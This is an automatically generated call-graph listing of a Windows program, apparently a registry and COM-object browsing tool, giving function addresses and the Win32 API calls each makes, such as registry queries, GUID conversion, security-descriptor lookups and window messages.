b628ff 7150->7153 7158 b67980 SendMessageW 7151->7158 7154 b628b0 7154->7153 7159 b678fa SendMessageW 7154->7159 7156 b628d3 7156->7153 7157->7150 7158->7154 7159->7156 7160 b62050 7161 b5b3d0 2 API calls 7160->7161 7162 b62081 7161->7162 7163 b62096 7162->7163 7165 b63d3b 7162->7165 7177 b63f53 #303 7165->7177 7167 b63d6d #540 7168 b5b3d0 2 API calls 7167->7168 7169 b63de4 7168->7169 7170 b63df9 7169->7170 7178 b63cfc #543 InitializeCriticalSection 7169->7178 7172 b5b3d0 2 API calls 7170->7172 7173 b63e1b 7172->7173 7174 b63e30 #1105 7173->7174 7179 b63cfc #543 InitializeCriticalSection 7173->7179 7174->7163 7177->7167 7178->7170 7179->7174 7180 b695d0 #4704 7181 b5b421 #1172 7180->7181 7182 b695df 7181->7182 7186 b69597 SendMessageW #2855 7182->7186 7184 b695ea SendMessageW 7186->7184 7187 b5dba0 7188 b5dbc4 7187->7188 7189 b5e15d 7187->7189 7191 b5dc21 #1662 lstrcmpW 7188->7191 7192 b5dbd3 #6195 #1143 LoadIconW SendMessageW #6195 7188->7192 7190 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7189->7190 7193 b5e16a 7190->7193 7195 b5dc41 #6195 #6195 #1143 LoadIconW SendMessageW 7191->7195 7196 b5dc9d memcmp 7191->7196 7282 b5e409 SendMessageW 7192->7282 7287 b69b32 7195->7287 7199 b5dcbe 7196->7199 7200 b5de59 StringFromGUID2 #6195 #6195 7196->7200 7201 b5dce1 #6195 7199->7201 7202 b5dccf #6195 7199->7202 7203 b5deb0 7200->7203 7204 b5de90 7200->7204 7206 b5dcef #1143 LoadIconW SendMessageW #6195 7201->7206 7202->7206 7209 b5deb5 7203->7209 7210 b5ded2 7203->7210 7207 b69b32 219 API calls 7204->7207 7211 b5dda6 7206->7211 7212 b5dd32 RegOpenKeyExW 7206->7212 7215 b5de9b 7207->7215 7217 b69b32 219 API calls 7209->7217 7213 b5def7 7210->7213 7214 b5ded7 7210->7214 7223 b5dde7 7211->7223 7224 b5ddab 7211->7224 7218 b5dd53 #6195 #1143 LoadIconW SendMessageW RegCloseKey 7212->7218 7219 b5dd92 7212->7219 7221 b5df00 7213->7221 7268 b5e113 7213->7268 7220 b69b32 219 API calls 7214->7220 7222 b5e466 18 API calls 7215->7222 7226 b5dec0 7217->7226 7218->7219 7230 b69b32 219 API calls 7219->7230 7229 b5dee2 7220->7229 7237 b69b32 219 API calls 7221->7237 7221->7268 7242 b5dea2 #1143 LoadIconW 7222->7242 7228 b5e409 10 API calls 7223->7228 7232 b69b32 219 API calls 7224->7232 7225 b5e156 #2644 7225->7189 7227 b5e466 18 API calls 7226->7227 7227->7242 7233 b5ddee lstrcmpW 7228->7233 7234 b5e466 18 API calls 7229->7234 7235 b5dd9d 7230->7235 7231 b69b32 219 API calls 7236 b5e129 7231->7236 7239 b5ddb6 7232->7239 7240 b5de06 #1143 LoadIconW SendMessageW 7233->7240 7241 b5de2b lstrcmpW 7233->7241 7234->7242 7243 b5e466 18 API calls 7235->7243 7244 b5e466 18 API calls 7236->7244 7245 b5df14 7237->7245 7247 b5e466 18 API calls 7239->7247 7240->7241 7241->7225 7248 b5de41 #1143 LoadIconW 7241->7248 7246 b5e10f SendMessageW 7242->7246 7249 b5dda4 7243->7249 7244->7242 7498 b5c6a6 LoadCursorW SetCursor 7245->7498 7246->7225 7252 b5ddbd #1143 LoadIconW SendMessageW 7247->7252 7248->7246 7249->7233 7252->7233 7253 b5df2b 7501 b60b66 LoadCursorW SetCursor 7253->7501 7255 b5df45 7504 b5f616 7255->7504 7262 b5dfc5 RegQueryValueW 7263 b5e079 7262->7263 7267 b5dff6 7262->7267 7625 b5d944 RegQueryValueW 7263->7625 7266 b5e0fe RegCloseKey 7266->7246 7266->7268 7270 b5e057 #1165 ExtractIconW 7267->7270 7271 b5e029 lstrcpyW wcsrchr 7267->7271 7268->7231 7269 b5d944 10 API calls 7272 b5e0a0 7269->7272 7270->7263 7270->7266 7271->7270 7273 b5e052 7271->7273 7272->7266 7274 b5d944 10 API calls 7272->7274 7273->7270 7275 b5e0b7 7274->7275 7275->7266 7276 b5d944 10 API calls 7275->7276 7277 b5e0ce 7276->7277 7277->7266 7278 b5d944 10 API calls 7277->7278 7279 b5e0e5 7278->7279 7279->7266 7280 b5d944 10 API calls 7279->7280 7281 b5e0fc 7280->7281 7281->7266 7283 b5dc1c 7282->7283 7284 b5e428 SendMessageW 7282->7284 7283->7189 7634 b5e583 7284->7634 7647 b6f6e0 7287->7647 7291 b69bb0 lstrcmpW 7292 b69bc2 RegOpenKeyExW 7291->7292 7293 b69c2f 7291->7293 7296 b69be4 #538 7292->7296 7297 b69c29 SendMessageW #2644 7292->7297 7294 b69dc2 7293->7294 7295 b69c3b wsprintfW 7293->7295 7301 b69e5b StringFromGUID2 7294->7301 7305 b69de9 7294->7305 7298 b6de06 2 API calls 7295->7298 7650 b69634 7296->7650 7303 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7297->7303 7302 b69c8a 7298->7302 7309 b6a070 7301->7309 7310 b69e9f RegOpenKeyExW 7301->7310 7306 b69cef 7302->7306 7307 b69c9e #538 #538 7302->7307 7308 b5dc91 7303->7308 7304 b69c0e #800 RegCloseKey 7304->7297 7305->7297 7311 b69df2 RegOpenKeyExW 7305->7311 7317 b69cfe #800 7306->7317 7318 b69d0c 7306->7318 7677 b69419 7307->7677 7486 b5e466 SendMessageW 7308->7486 7314 b6a264 7309->7314 7315 b6a079 RegOpenKeyExW 7309->7315 7310->7297 7313 b69ec5 RegQueryValueExW 7310->7313 7311->7297 7316 b69e19 #538 7311->7316 7319 b69f21 wsprintfW 7313->7319 7320 b69efe wsprintfW 7313->7320 7322 b6ab18 RegOpenKeyExW 7314->7322 7323 b6a275 RegQueryValueW wsprintfW 7314->7323 7315->7297 7321 b6a09f RegQueryValueExW 7315->7321 7324 b69634 30 API calls 7316->7324 7317->7318 7325 b69d15 #800 7318->7325 7326 b69d20 SendMessageW wsprintfW RegOpenKeyExW 7318->7326 7327 b69f3b 7319->7327 7320->7327 7328 b6a0f7 wsprintfW 7321->7328 7329 b6a0d8 wsprintfW 7321->7329 7322->7297 7330 b6ab3e RegQueryValueExW wsprintfW 7322->7330 7331 b6de06 2 API calls 7323->7331 7332 b69e47 #800 7324->7332 7325->7326 7326->7297 7333 b69d82 #538 7326->7333 7334 b6de06 2 API calls 7327->7334 7335 b6a10d 7328->7335 7329->7335 7336 b6de06 2 API calls 7330->7336 7339 b6a2d8 7331->7339 7340 b6b33d RegCloseKey 7332->7340 7341 b69634 30 API calls 7333->7341 7342 b69f4e 7334->7342 7337 b6de06 2 API calls 7335->7337 7338 b6ab9f 7336->7338 7343 b6a120 7337->7343 7344 b6abb3 #538 #538 7338->7344 7356 b6ac0e 7338->7356 7345 b6a2ec #538 #538 7339->7345 7359 b6a34d 7339->7359 7340->7297 7346 b69dae #800 7341->7346 7347 b69f60 #538 #538 7342->7347 7348 b69fb9 7342->7348 7350 b6a132 #538 #538 7343->7350 7360 b6a182 7343->7360 7351 b69419 6 API calls 7344->7351 7352 b69419 6 API calls 7345->7352 7353 b6b329 7346->7353 7349 b69419 6 API calls 7347->7349 7357 b69fd6 7348->7357 7358 b69fc8 #800 7348->7358 7349->7348 7355 b69419 6 API calls 7350->7355 7351->7356 7352->7359 7354 b6b32a SendMessageW 7353->7354 7354->7340 7355->7360 7361 b6ac1c #800 7356->7361 7362 b6ac2d 7356->7362 7365 b69fdf #800 7357->7365 7366 b69fea SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 7357->7366 7358->7357 7363 b6a376 7359->7363 7364 b6a35f #800 7359->7364 7367 b6a191 #800 7360->7367 7368 b6a19f 7360->7368 7361->7362 7369 b6ac36 #800 7362->7369 7370 b6ac44 SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 7362->7370 7371 b6a382 #800 7363->7371 7372 b6a399 SendMessageW wsprintfW RegOpenKeyExW 7363->7372 7364->7363 7365->7366 7366->7297 7373 b6a052 #538 7366->7373 7367->7368 7374 b6a1b3 SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 7368->7374 7375 b6a1a8 #800 7368->7375 7369->7370 7370->7297 7376 b6acb0 #538 7370->7376 7371->7372 7372->7297 7377 b6a3f9 #538 7372->7377 7373->7309 7374->7297 7378 b6a21f #538 7374->7378 7375->7374 7379 b69634 30 API calls 7376->7379 7380 b69634 30 API calls 7377->7380 7381 b69634 30 API calls 7378->7381 7382 b6ace5 #800 SendMessageW RegQueryValueW 7379->7382 7383 b6a42f #800 SendMessageW 7380->7383 7384 b6a24f #800 7381->7384 7385 b6ae02 RegQueryValueW 7382->7385 7386 b6ad3e 7382->7386 7681 b6d057 7383->7681 7384->7354 7389 b6ae56 RegQueryValueW wsprintfW 7385->7389 7390 b6ae2f RegQueryValueW 7385->7390 7386->7385 7391 b6ad4b #537 #925 RegOpenKeyExW #800 #800 7386->7391 7394 b6de06 2 API calls 7389->7394 7390->7389 7393 b6b12a RegQueryValueW 7390->7393 7395 b6adfd 7391->7395 7396 b6adad #538 7391->7396 7392 b6a657 7404 b6a662 RegQueryValueW 7392->7404 7393->7340 7398 b6b15c RegQueryValueW wsprintfW 7393->7398 7400 b6aeb4 7394->7400 7395->7385 7397 b69634 30 API calls 7396->7397 7401 b6ade2 #800 RegCloseKey 7397->7401 7402 b6de06 2 API calls 7398->7402 7405 b6af26 7400->7405 7406 b6aec8 #538 #538 7400->7406 7401->7395 7407 b6b1b4 7402->7407 7409 b6a68f 7404->7409 7410 b6a69d 7404->7410 7417 b6af38 #800 7405->7417 7418 b6af49 7405->7418 7411 b69419 6 API calls 7406->7411 7412 b6b222 7407->7412 7413 b6b1c8 #538 #538 7407->7413 7408 b6a4b7 7414 b6de06 2 API calls 7408->7414 7415 b6a720 wsprintfW RegOpenKeyExW 7409->7415 7410->7415 7416 b6a6a7 RegOpenKeyExW 7410->7416 7411->7405 7430 b6b234 #800 7412->7430 7431 b6b245 7412->7431 7419 b69419 6 API calls 7413->7419 7420 b6a4d3 7414->7420 7422 b6a760 RegQueryValueW wsprintfW 7415->7422 7423 b6a8f1 RegQueryValueW 7415->7423 7416->7415 7421 b6a6c7 #538 7416->7421 7417->7418 7424 b6af66 SendMessageW RegOpenKeyExW 7418->7424 7425 b6af55 #800 7418->7425 7419->7412 7428 b6a4e7 #538 #538 7420->7428 7429 b6a543 7420->7429 7432 b69634 30 API calls 7421->7432 7435 b6de06 2 API calls 7422->7435 7433 b6a923 wsprintfW RegOpenKeyExW 7423->7433 7434 b6aaee RegCloseKey SendMessageW 7423->7434 7426 b6b111 SendMessageW 7424->7426 7427 b6afa8 RegQueryValueW 7424->7427 7425->7424 7426->7393 7437 b6afd6 RegOpenKeyExW 7427->7437 7438 b6b04b RegQueryValueW 7427->7438 7439 b69419 6 API calls 7428->7439 7450 b6a555 #800 7429->7450 7451 b6a56c 7429->7451 7430->7431 7440 b6b251 #800 7431->7440 7441 b6b25c 6 API calls 7431->7441 7442 b6a705 #800 RegCloseKey 7432->7442 7433->7434 7443 b6a967 RegQueryValueW wsprintfW 7433->7443 7434->7297 7436 b6a7c6 7435->7436 7444 b6a7dc #538 #538 7436->7444 7445 b6a836 7436->7445 7446 b6b03f RegCloseKey 7437->7446 7447 b6affb #538 7437->7447 7448 b6b105 RegCloseKey 7438->7448 7449 b6b078 lstrcmpiW 7438->7449 7439->7429 7440->7441 7441->7353 7452 b6b2de #538 7441->7452 7442->7415 7453 b6de06 2 API calls 7443->7453 7455 b69419 6 API calls 7444->7455 7464 b6a848 #800 7445->7464 7465 b6a859 7445->7465 7446->7438 7456 b69634 30 API calls 7447->7456 7448->7426 7449->7448 7457 b6b090 RegOpenKeyExW 7449->7457 7450->7451 7458 b6a58f SendMessageW 7451->7458 7459 b6a578 #800 7451->7459 7460 b69634 30 API calls 7452->7460 7454 b6a9c9 7453->7454 7462 b6a9df #538 #537 7454->7462 7471 b6aa39 7454->7471 7455->7445 7463 b6b030 #800 7456->7463 7466 b6b0b5 #538 7457->7466 7467 b6b0f9 RegCloseKey 7457->7467 7693 b6d67d 7458->7693 7459->7458 7468 b6b30e #800 RegCloseKey 7460->7468 7470 b69419 6 API calls 7462->7470 7463->7446 7464->7465 7472 b6a876 SendMessageW #538 7465->7472 7473 b6a865 #800 7465->7473 7474 b69634 30 API calls 7466->7474 7467->7448 7468->7353 7470->7471 7476 b6aa5c 7471->7476 7477 b6aa4b #800 7471->7477 7478 b69634 30 API calls 7472->7478 7473->7472 7479 b6b0ea #800 7474->7479 7475 b69634 30 API calls 7480 b6a615 #800 SendMessageW RegCloseKey 7475->7480 7481 b6aa73 SendMessageW #538 7476->7481 7482 b6aa68 #800 7476->7482 7477->7476 7483 b6a8c2 #800 SendMessageW RegCloseKey 7478->7483 7479->7467 7480->7404 7484 b69634 30 API calls 7481->7484 7482->7481 7483->7423 7485 b6aabf #800 SendMessageW RegCloseKey 7484->7485 7485->7434 7487 b5e493 #6211 SendMessageW SendMessageW 7486->7487 7488 b5dc98 7486->7488 7489 b5e583 6 API calls 7487->7489 7488->7225 7490 b5e4cc 7489->7490 7491 b5e4e0 SendMessageW 7490->7491 7492 b5e4ce SendMessageW 7491->7492 7493 b5e4f8 SendMessageW 7491->7493 7492->7491 7494 b5e52e SendMessageW 7493->7494 7495 b5e50e SendMessageW 7493->7495 7496 b5e583 6 API calls 7494->7496 7495->7494 7497 b5e54b SendMessageW RedrawWindow RedrawWindow 7496->7497 7497->7488 7713 b5c6f3 SendMessageW 7498->7713 7762 b60bbb SendMessageW 7501->7762 7772 b6f415 7504->7772 7506 b5f625 #540 StringFromGUID2 SendMessageW 7507 b6d67d 9 API calls 7506->7507 7508 b5f69f #861 7507->7508 7510 b6d67d 9 API calls 7508->7510 7511 b5f6ed #6195 7510->7511 7513 b5f71b 7511->7513 7522 b5f973 7511->7522 7514 b5f944 7513->7514 7516 b5f7f7 7513->7516 7517 b5f72d 7513->7517 7518 b6d67d 9 API calls 7514->7518 7515 b6d67d 9 API calls 7519 b5f9c5 #861 #2756 7515->7519 7523 b6d67d 9 API calls 7516->7523 7520 b5f736 #3087 #2634 7517->7520 7521 b5fc33 7517->7521 7518->7522 7528 b5f9f3 #2756 7519->7528 7529 b5fa1b SendMessageW 7519->7529 7525 b6d67d 9 API calls 7520->7525 7780 b5f090 17 API calls 7521->7780 7522->7515 7527 b5f826 7523->7527 7532 b5f77a #861 7525->7532 7534 b5f830 #861 7527->7534 7535 b5f84c #861 7527->7535 7528->7529 7530 b5fa04 SendMessageW 7528->7530 7531 b6d67d 9 API calls 7529->7531 7538 b5fa82 #2634 7530->7538 7540 b5fa6c 7531->7540 7546 b6d67d 9 API calls 7532->7546 7533 b5fc3a 7781 b6020e 7533->7781 7536 b5f863 7534->7536 7537 b5f848 7534->7537 7539 b5f858 #2634 7535->7539 7543 b6d67d 9 API calls 7536->7543 7537->7539 7545 b6d67d 9 API calls 7538->7545 7539->7536 7540->7538 7544 b5fa70 #861 7540->7544 7549 b5f896 7543->7549 7544->7538 7550 b5facf 7545->7550 7551 b5f7c8 #861 #2634 7546->7551 7548 b6f3c4 4 API calls 7552 b5df5f 7548->7552 7553 b5f89e lstrcmpiW 7549->7553 7568 b5f8b4 SendMessageW 7549->7568 7554 b5fad7 lstrcmpiW 7550->7554 7565 b5faed SendMessageW 7550->7565 7558 b5fc28 #2634 7551->7558 7572 b5cb16 7552->7572 7556 b5f8bb lstrcmpiW 7553->7556 7553->7568 7557 b5faf4 lstrcmpiW 7554->7557 7554->7565 7561 b5f8d8 lstrcmpiW 7556->7561 7556->7568 7562 b5fb11 lstrcmpiW 7557->7562 7557->7565 7558->7521 7564 b5f8f5 lstrcmpiW 7561->7564 7561->7568 7562->7565 7566 b5fb2e lstrcmpiW 7562->7566 7564->7568 7773 b6d605 7565->7773 7566->7565 7568->7514 7569 b5fbb7 SendMessageW 7571 b5fbe5 6 API calls 7569->7571 7570 b5fbd0 SendMessageW 7570->7571 7571->7558 7795 b6f415 7572->7795 7574 b5cb25 #540 StringFromGUID2 7575 b6d605 12 API calls 7574->7575 7576 b5cb98 7575->7576 7577 b6d605 12 API calls 7576->7577 7578 b5cbd6 #861 7577->7578 7580 b6d605 12 API calls 7578->7580 7581 b5cc2d 7580->7581 7582 b5cc31 lstrcmpW 7581->7582 7583 b5cc79 #2634 #6195 7581->7583 7584 b5cc62 #6195 #2634 7582->7584 7585 b5cc49 #6195 #2634 7582->7585 7586 b5cc8e 7583->7586 7584->7586 7587 b5cc92 SendMessageW #6330 #800 7585->7587 7586->7587 7588 b6f3c4 4 API calls 7587->7588 7589 b5ccc1 7588->7589 7590 b5e1a4 7589->7590 7591 b6d4cd 5 API calls 7590->7591 7592 b5e1b4 7591->7592 7593 b5e1cd SendMessageW SendMessageW 7592->7593 7594 b5e1c1 7592->7594 7595 b6db15 3 API calls 7593->7595 7596 b5e466 18 API calls 7594->7596 7597 b5e204 7595->7597 7598 b5df80 wsprintfW RegOpenKeyExW 7596->7598 7599 b5e228 7597->7599 7600 b5e210 SendMessageW 7597->7600 7598->7225 7598->7262 7601 b6db15 3 API calls 7599->7601 7600->7598 7600->7599 7603 b5e22d 7601->7603 7602 b5e251 #6211 SendMessageW SendMessageW 7605 b5e2b4 SendMessageW 7602->7605 7606 b5e281 SendMessageW 7602->7606 7603->7602 7604 b5e239 SendMessageW 7603->7604 7604->7598 7604->7602 7608 b5e2e4 7605->7608 7609 b5e2c7 SendMessageW 7605->7609 7606->7605 7607 b5e298 SendMessageW 7606->7607 7610 b5e583 6 API calls 7607->7610 7611 b6db15 3 API calls 7608->7611 7609->7608 7610->7605 7612 b5e2e9 7611->7612 7613 b5e391 7612->7613 7615 b6d4cd 5 API calls 7612->7615 7614 b5e396 SendMessageW SendMessageW SendMessageW 7613->7614 7616 b5e583 6 API calls 7614->7616 7617 b5e2f6 7615->7617 7618 b5e3e0 SendMessageW RedrawWindow 7616->7618 7619 b5e32c 7617->7619 7620 b5e2ff SendMessageW SendMessageW 7617->7620 7618->7598 7621 b6d4cd 5 API calls 7619->7621 7620->7619 7622 b5e331 7621->7622 7623 b5e335 SendMessageW SendMessageW 7622->7623 7624 b5e362 SendMessageW SendMessageW 7622->7624 7623->7624 7624->7614 7626 b5d983 lstrlenW 7625->7626 7627 b5d9fb 7625->7627 7629 b5d99b 7626->7629 7628 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7627->7628 7632 b5da08 7628->7632 7630 b5d9e0 #1165 ExtractIconW 7629->7630 7631 b5d9b3 lstrcpyW wcsrchr 7629->7631 7630->7627 7631->7630 7633 b5d9db 7631->7633 7632->7266 7632->7269 7633->7630 7635 b5e599 7634->7635 7636 b5e648 #6211 7634->7636 7639 b5e625 #6211 7635->7639 7640 b5e5a2 7635->7640 7637 b5e5cd RedrawWindow 7636->7637 7638 b5e444 SendMessageW #6211 7636->7638 7637->7638 7638->7283 7639->7637 7639->7638 7642 b5e5a7 7640->7642 7643 b5e602 #6211 7640->7643 7644 b5e5ac 7642->7644 7645 b5e5df #6211 7642->7645 7643->7637 7643->7638 7644->7638 7646 b5e5b5 #6211 7644->7646 7645->7637 7645->7638 7646->7637 7646->7638 7648 b69b4f #1662 SendMessageW 7647->7648 7649 b6559e SendMessageW 7648->7649 7649->7291 7700 b6f3e2 7650->7700 7652 b69643 RegQueryInfoKeyW 7653 b69678 7652->7653 7654 b696b8 7652->7654 7653->7654 7655 b69758 RegEnumValueW 7653->7655 7654->7304 7666 b697ad 7655->7666 7656 b69946 lstrcpyW 7656->7666 7657 b698fc lstrcpyW 7657->7666 7658 b6de06 2 API calls 7658->7666 7659 b6987a memset 7659->7666 7660 b69979 #538 #538 7701 b693af 7660->7701 7661 b69862 wsprintfW 7661->7666 7663 b69930 wsprintfW 7663->7666 7664 b69843 wsprintfW 7664->7666 7665 b699cd #800 7665->7666 7666->7656 7666->7657 7666->7658 7666->7659 7666->7660 7666->7661 7666->7663 7666->7664 7666->7665 7667 b699e6 #800 7666->7667 7668 b69922 wsprintfW 7666->7668 7669 b698c2 _itow 7666->7669 7670 b699fa SendMessageW RegEnumValueW 7666->7670 7674 b69a57 7666->7674 7667->7666 7668->7666 7669->7666 7670->7666 7671 b69b15 RegEnumKeyW 7671->7654 7672 b69aa6 RegOpenKeyExW 7671->7672 7673 b69abe #538 7672->7673 7672->7674 7675 b69634 8 API calls 7673->7675 7674->7654 7674->7671 7676 b69ae0 #800 SendMessageW RegCloseKey 7675->7676 7676->7674 7706 b6f3e2 7677->7706 7679 b69425 6 API calls 7680 b69482 7679->7680 7680->7306 7682 b6d67d 9 API calls 7681->7682 7683 b6d0a1 7682->7683 7684 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7683->7684 7685 b6a466 7684->7685 7685->7392 7686 b6d2f7 7685->7686 7687 b6d67d 9 API calls 7686->7687 7688 b6d34e wsprintfW 7687->7688 7689 b6d384 7688->7689 7690 b6d370 lstrcatW lstrcatW 7688->7690 7691 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7689->7691 7690->7689 7692 b6a48e RegOpenKeyExW 7691->7692 7692->7392 7692->7408 7707 b6d473 StringFromGUID2 wsprintfW 7693->7707 7698 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7699 b6a5e3 #538 7698->7699 7699->7475 7700->7652 7705 b6f3e2 7701->7705 7703 b693bb 6 API calls 7704 b69416 7703->7704 7704->7666 7705->7703 7706->7679 7708 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7707->7708 7709 b6d4c9 7708->7709 7710 b6d6f5 RegOpenKeyExW 7709->7710 7711 b6d6e4 7710->7711 7712 b6d71a RegQueryValueExW RegCloseKey 7710->7712 7711->7698 7712->7711 7714 b6d2f7 12 API calls 7713->7714 7715 b5c745 7714->7715 7723 b6c0bc 7715->7723 7718 b5c7a5 SendMessageW SendMessageW 7720 b5c7c1 #2634 #2634 7718->7720 7719 b5c78a SendMessageW SendMessageW 7719->7720 7721 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7720->7721 7722 b5c6d9 LoadCursorW SetCursor 7721->7722 7722->7253 7761 b6f415 7723->7761 7725 b6c0cb #540 RegOpenKeyExW 7726 b6c157 7725->7726 7727 b6c11e RegQueryValueExW 7725->7727 7730 b6c159 #800 7726->7730 7728 b6c146 7727->7728 7729 b6c16e malloc 7727->7729 7728->7729 7733 b6c14b RegCloseKey 7728->7733 7731 b6c187 RegCloseKey 7729->7731 7732 b6c198 RegQueryValueExW RegCloseKey 7729->7732 7734 b6f3c4 4 API calls 7730->7734 7731->7726 7736 b6c1d6 GetSecurityDescriptorDacl 7732->7736 7737 b6c1cc free 7732->7737 7733->7726 7735 b5c76e 7734->7735 7735->7718 7735->7719 7738 b6c1f6 GetLastError 7736->7738 7739 b6c203 7736->7739 7737->7726 7738->7726 7740 b6c210 #2810 SendMessageW 7739->7740 7741 b6c2dd GetAce 7739->7741 7742 b6c2d0 free 7740->7742 7743 b6c25b SendMessageW SendMessageW SendMessageW 7740->7743 7744 b6c5ac GetLastError 7741->7744 7745 b6c2f9 7741->7745 7742->7730 7743->7742 7746 b6c31c LookupAccountSidW 7745->7746 7747 b6c571 #3993 7745->7747 7748 b6c449 LookupAccountSidW 7745->7748 7749 b6c37e #2810 7746->7749 7750 b6c35a #2810 7746->7750 7754 b6c584 GetAce 7747->7754 7752 b6c487 #2810 7748->7752 7753 b6c4ab #2810 7748->7753 7751 b6c391 SendMessageW 7749->7751 7750->7751 7751->7754 7755 b6c3cd SendMessageW SendMessageW 7751->7755 7756 b6c4be SendMessageW 7752->7756 7753->7756 7754->7745 7757 b6c5a6 7754->7757 7758 b6c43c 7755->7758 7759 b6c559 SendMessageW 7755->7759 7756->7754 7760 b6c4fa SendMessageW SendMessageW 7756->7760 7757->7744 7758->7759 7759->7754 7760->7758 7761->7725 7763 b6d2f7 12 API calls 7762->7763 7764 b60c07 7763->7764 7765 b6c0bc 39 API calls 7764->7765 7766 b60c2a 7765->7766 7767 b60c2e #2634 SendMessageW SendMessageW 7766->7767 7768 b60c5f SendMessageW SendMessageW UpdateWindow #2634 #2634 7766->7768 7769 b60ca8 7767->7769 7768->7769 7770 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7769->7770 7771 b60b99 #6330 LoadCursorW SetCursor 7770->7771 7771->7255 7772->7506 7774 b6d2f7 12 API calls 7773->7774 7775 b6d64e 7774->7775 7776 b6d6f5 3 API calls 7775->7776 7777 b6d66c 7776->7777 7778 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7777->7778 7779 b5fbab 7778->7779 7779->7569 7779->7570 7780->7533 7782 b6036b 16 API calls 7781->7782 7783 b60229 7781->7783 7786 b6040d #3087 #6211 7782->7786 7784 b60342 #3087 #6211 #3087 #6211 7783->7784 7785 b60232 7783->7785 7789 b60315 #3087 #6211 #3087 #6211 7784->7789 7787 b602eb #3087 #6211 #3087 #6211 7785->7787 7788 b6023b 7785->7788 7790 b60420 7786->7790 7787->7789 7788->7790 7791 b60244 8 API calls 7788->7791 7792 b60296 8 API calls 7789->7792 7793 b5fc41 #6330 #800 7790->7793 7794 b60429 8 API calls 7790->7794 7791->7792 7792->7786 7793->7548 7794->7793 7795->7574 7796 b6ee23 7811 b6fd98 7796->7811 7798 b6ee2f GetStartupInfoW 7799 b6ee4c 7798->7799 7800 b6ee61 7799->7800 7801 b6ee68 Sleep 7799->7801 7802 b6ee80 _amsg_exit 7800->7802 7803 b6ee8a 7800->7803 7801->7799 7802->7803 7804 b6eecc _initterm 7803->7804 7805 b6eead 7803->7805 7806 b6eee7 __IsNonwritableInCurrentImage 7803->7806 7804->7806 7806->7805 7808 b6ef84 exit 7806->7808 7809 b6efd3 7806->7809 7812 b700d1 7806->7812 7808->7806 7809->7805 7810 b6efdc _cexit 7809->7810 7810->7805 7811->7798 7813 b700dc #1569 7812->7813 7814 b5fc60 7816 b5fc7d #4435 7814->7816 7817 b5fce0 16 API calls 7818 b5fe2c 7817->7818 7819 b5fe0b GetProcAddress 7817->7819 7822 b5f616 124 API calls 7818->7822 7820 b5fe25 FreeLibrary 7819->7820 7821 b5fe1b 7819->7821 7820->7818 7821->7820 7823 b5fe3f 7822->7823 7824 b616a0 #4146 7838 b63a60 7839 b63a96 7838->7839 7840 b63ac5 7838->7840 7839->7840 7841 b63aca #1662 7839->7841 7842 b63adc 7841->7842 7866 b5e18b SendMessageW 7842->7866 7844 b63ae3 7845 b63b01 7844->7845 7846 b63af1 7844->7846 7848 b63b0f 7845->7848 7849 b63b1c 7845->7849 7868 b6693c 7846->7868 7885 b65601 RegOpenKeyW 7848->7885 7851 b63b37 7849->7851 7852 b63b2a 7849->7852 7854 b63b45 7851->7854 7855 b63b52 7851->7855 7903 b673b0 RegOpenKeyW 7852->7903 7857 b6642d 57 API calls 7854->7857 7858 b63b87 7855->7858 7859 b63b58 7855->7859 7856 b63b50 7867 b5e18b SendMessageW 7856->7867 7857->7856 7967 b6591d 7858->7967 7859->7858 7860 b63b61 7859->7860 7929 b66c29 7860->7929 7864 b63ba3 #2644 7864->7840 7865 b63afc 7865->7856 7866->7844 7867->7864 7869 b66c10 7868->7869 7870 b6698b RegOpenKeyW 7868->7870 7872 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7869->7872 7870->7869 7871 b669ee 7870->7871 7873 b66a04 RegEnumKeyW 7871->7873 7878 b66a6c wsprintfW 7871->7878 7879 b5b3d0 2 API calls 7871->7879 7880 b63e89 2 API calls 7871->7880 7881 b66ae9 7871->7881 7874 b66c25 7872->7874 7875 b66a27 RegQueryValueW 7873->7875 7876 b66c04 RegCloseKey 7873->7876 7874->7865 7875->7871 7877 b66bff 7875->7877 7876->7869 7877->7876 7878->7871 7879->7871 7880->7871 7882 b66b11 CLSIDFromString 7881->7882 7883 b66b29 7881->7883 7882->7883 8023 b67f0b SendMessageW 7883->8023 7886 b65904 7885->7886 7894 b65661 7885->7894 7888 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7886->7888 7887 b65681 RegEnumKeyW 7889 b658f8 RegCloseKey 7887->7889 7887->7894 7890 b65919 7888->7890 7889->7886 7890->7865 7891 b658f3 7891->7889 7892 b5b3d0 2 API calls 7892->7894 7893 b63e89 2 API calls 7893->7894 7894->7887 7894->7891 7894->7892 7894->7893 7895 b65737 wsprintfW RegQueryValueW 7894->7895 7896 b657b0 7895->7896 7897 b657bf CLSIDFromString 7896->7897 7902 b657d7 7896->7902 7898 b65837 lstrcpyW lstrlenW 7897->7898 7899 b658b2 wsprintfW 7898->7899 7900 b658ce 7898->7900 7899->7900 8024 b67f0b SendMessageW 7900->8024 7902->7898 7904 b67410 RegEnumKeyW 7903->7904 7905 b6775a 7903->7905 7909 b6774e RegCloseKey 7904->7909 7910 b67449 RegOpenKeyW 7904->7910 7906 b6f3a0 